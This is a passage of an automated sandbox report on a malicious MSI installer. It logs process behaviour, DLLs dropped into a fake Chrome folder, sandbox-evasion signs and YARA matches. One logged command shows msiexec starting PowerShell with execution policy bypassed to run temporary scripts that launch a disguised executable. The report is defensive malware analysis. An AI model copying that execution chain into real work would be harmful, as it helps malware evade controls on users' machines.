                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4741Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5069Jump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeDropped PE file which has not been started: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE790.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeDropped PE file which has not been started: C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcamp140_app.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\mrt100_app.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vccorlib140_app.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE7DF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE740.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE6C2.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIED31.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeDropped PE file which has not been started: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcomp140_app.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE770.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeAPI coverage: 1.4 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1880Thread sleep count: 4741 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2004Thread sleep count: 5069 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0028A230 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,6_2_00007FFE0028A230
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000003.00000002.1833888809.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                  Source: powershell.exe, 00000003.00000002.1833888809.0000000000E4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FF60BD740E0 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,6_2_00007FF60BD740E0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FF60BD72AA0 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,6_2_00007FF60BD72AA0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FF60BD738A0 GetProcessHeap,HeapFree,6_2_00007FF60BD738A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CD5C268 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF74CD5C268

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: 2024.0198840 298135.msi, type: SAMPLE
                  Source: Yara matchFile source: amsi32_7128.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7128, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Config.Msi\53e56c.rbs, type: DROPPED
                  Source: Yara matchFile source: C:\Windows\Installer\MSIE83E.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Windows\Installer\53e56a.msi, type: DROPPED
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe "C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe" Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\psseddb.ps1" -propfile "c:\users\user\appdata\local\temp\msiedc7.txt" -scriptfile "c:\users\user\appdata\local\temp\scredc8.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scredc9.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\psseddb.ps1" -propfile "c:\users\user\appdata\local\temp\msiedc7.txt" -scriptfile "c:\users\user\appdata\local\temp\scredc8.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scredc9.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."Jump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: ___lc_locale_name_func,GetLocaleInfoEx,6_2_00007FFE002AFAE0
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
